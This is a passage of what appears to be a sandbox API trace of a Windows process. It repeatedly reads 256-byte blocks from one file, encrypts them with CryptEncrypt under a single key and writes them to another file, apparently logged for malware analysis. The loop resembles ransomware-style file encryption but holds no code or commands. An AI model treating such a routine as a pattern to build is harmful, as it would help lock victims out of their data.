hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.208] GetLastError () returned 0x0 [0168.208] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.208] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.208] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.208] GetLastError () returned 0x0 [0168.208] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.208] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.208] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.208] GetLastError () returned 0x0 [0168.208] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.208] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.208] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.208] GetLastError () returned 0x0 [0168.208] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.208] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.208] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.208] GetLastError () returned 0x0 [0168.208] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.208] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.208] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.208] GetLastError () returned 0x0 [0168.208] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.209] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.209] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.209] GetLastError () returned 0x0 [0168.209] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.209] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.209] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.209] GetLastError () returned 0x0 [0168.209] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.209] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.209] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.209] GetLastError () returned 0x0 [0168.209] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.209] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.209] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.209] GetLastError () returned 0x0 [0168.209] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.209] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.209] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.209] GetLastError () returned 0x0 [0168.209] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.209] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.209] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.209] GetLastError () returned 0x0 [0168.209] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.209] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.210] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.210] GetLastError () returned 0x0 [0168.210] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.210] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.210] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.210] GetLastError () returned 0x0 [0168.210] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.210] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.210] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.210] GetLastError () returned 0x0 [0168.210] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.210] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.210] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.210] GetLastError () returned 0x0 [0168.210] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.210] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.210] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.210] GetLastError () returned 0x0 [0168.210] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.210] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.210] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.210] GetLastError () returned 0x0 [0168.210] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.210] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.211] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.211] GetLastError () returned 0x0 [0168.211] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.211] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.211] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.211] GetLastError () returned 0x0 [0168.211] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.211] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.211] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.211] GetLastError () returned 0x0 [0168.211] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.211] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.211] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.211] GetLastError () returned 0x0 [0168.211] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.211] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.211] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.211] GetLastError () returned 0x0 [0168.211] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.211] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.211] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.211] GetLastError () returned 0x0 [0168.211] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.211] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.211] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.211] GetLastError () returned 0x0 [0168.211] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.212] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.212] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.212] GetLastError () returned 0x0 [0168.212] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.212] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.212] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.212] GetLastError () returned 0x0 [0168.212] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.212] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.212] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.212] GetLastError () returned 0x0 [0168.212] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.212] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.212] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.212] GetLastError () returned 0x0 [0168.212] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.212] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.212] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.212] GetLastError () returned 0x0 [0168.212] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.212] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.212] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.212] GetLastError () returned 0x0 [0168.212] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.213] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.213] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0168.213] GetLastError () returned 0x0 [0168.213] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0168.213] ReadFile (in: hFile=0x15b0, lpBuffer=0x2882928, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2882928*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0168.213] CryptEncrypt (in: hKey=0x9ad2f8, hHash=0x0, Final=0, dwFlags=0x0, 